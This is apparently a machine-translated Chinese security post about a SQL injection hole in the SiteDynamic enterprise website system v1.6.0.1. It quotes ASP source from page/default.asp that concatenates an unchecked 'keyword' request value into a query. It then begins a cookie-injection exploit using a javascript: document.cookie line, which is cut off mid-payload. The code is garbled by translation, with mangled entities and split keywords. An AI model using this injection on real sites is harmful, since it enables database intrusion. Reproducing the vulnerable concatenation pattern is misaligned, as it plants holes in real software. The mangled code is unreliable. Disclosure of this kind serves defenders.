SiteDynamic enterprise website management system v1.6.0.1 I will not talk about it much, there are not many websites used, and I helped my friends dig holes. On the Forum, xiya posted the fckeditor Upload Vulnerability. Read the Code:
001 // page/default. asp 5-122
002
003
004 <%
005 pageID = strCLng (Trim (Request ("pageID ")))
006 ID = strCLng (Trim (Request ("ID ")))
007
008 If isNumeric (pageID) = False Then
009 FoundErr = True
010 Message = Message & amp; "<li> parameter error! </Li>"
011 End If
012
013 if FoundErr <> True then
014
015 if ID = 0 then
016
017 If pageID <> 0 Then
018 set rs = server. CreateObject ("adodb. recordset ")
019 SQL = "Select * from db_channel where pageID =" & amp; pageID
020 rs. open SQL, conn, 1, 1
021 pageName = rs ("pageName ")
022 description = rs ("description ")
023 keywords = rs ("keywords ")
024 pic = rs ("pic ")
025 link = rs ("link ")
026 PageMode = rs ("PageMode ")
027 PageAmount = rs ("PageAmount ")
028 PageLine = rs ("PageLine ")
029 intro = rs ("intro ")
030
031 If Not rs. Eof Then
032 if rs ("pageID")> 0 then
033 if rs ("ChiID")> 0 then
034 strChiID = ""
035 set strrs1_conn.exe cute ("select pageID from db_channel where ParentID =" & amp; rs ("pageID") & amp; "or ParentPath like & apos;" & amp; rs ("ParentPath") & amp; "," & amp; rs ("pageID") & amp; ", % & apos ;")
036
037 do while not strRs. eof
038 if strChiID = "" then
039 strChiID = strRs (0)
040 else
041 strChiID = strChiID & amp; "," & amp; strRs (0)
042 end if
043 strRs. movenext
044 loop
045 else
046 strChiID = pageID
047 end if
048 end if
049 end If
050 rs. close
051 set rs = nothing
052
053 SQL = "select * from db_page Where pageID in (" & amp; strChiID & amp ;")"
054 Else
055 SQL = "select * from db_page where 1 = 1"
056 End If
057 else
058 SQL = "select * from db_page where ID =" & amp; ID & amp ;""
059 End if
060
061 if not (Trim (Request ("keyword") = "" or isempty (Trim (Request ("keyword") then
062 SQL = SQL & amp; "and (title like & apos; %" & amp; Trim (Request ("keyword") & amp; "% & apos; or content like & apos; % "& amp; Trim (Request (" keyword ") & amp;" % & apos;) "// bugs
063 end if
064
065 SQL = SQL & amp; "order by dateandtime desc"
066 & apos; response. write SQL
067 & apos; response. end
068 set rs = server. CreateObject ("adodb. recordset ")
069 rs. open SQL, conn, 1, 1
070
071 if ID <> 0 then
072 if Trim (rs ("PageMode") = 4 then
073 response. redirect Trim (rs ("URL "))
074 end if
075 & apos; file type
076 if Trim (rs ("PageMode") = 3 then
077 filesURL = Trim (rs ("files "))
078 If filesURL = "" Then
079 response. write "No data! "
080 End If
081 Call Getdownload (filesURL)
082 end if
083
084 srtTitle = Trim (rs ("Title "))
085 srtPageID = Trim (rs ("pageID "))
086 description = rs ("description ")
087 keywords = rs ("keywords ")
088 end if
089
090 sub getTitle ()
091 if pageID = 0 and ID = 0 then
092 response. write "full-text search"
093 elseif pageID <> 0 then
094 response. write "" & amp; pageName & amp ;""
095 elseif ID <> 0 then
096 response. write "" & amp; srtTitle & amp ;""
097 end if
098 end sub
099
100 sub getadoTitle ()
101 if pageID = 0 and ID = 0 then
102 response. write "full-text search"
103 elseif pageID <> 0 then
104 response. write "" & amp; pageName & amp ;""
105 elseif ID <> 0 then
106 doPageID = rs ("PageID ")
107 set doRs = server. CreateObject ("adodb. recordset ")
108 Set doRs = conn. Execute ("Select * From db_channel Where pageID =" & amp; doPageID)
109 response. write "" & amp; Trim (doRs ("pageName") & amp ;""
110 end if
111 end sub
112
113 sub getLocation ()
114 if pageID = 0 and ID = 0 then
115 response. write "-& amp; gt; full-text search"
116 elseif ID <> 0 then
117 call Nav (srtPageID)
118 else
119 call Nav (pageID)
120 end if
121 end sub
Use Code
Javascript: alert (document. cookie = "keyword =" + esc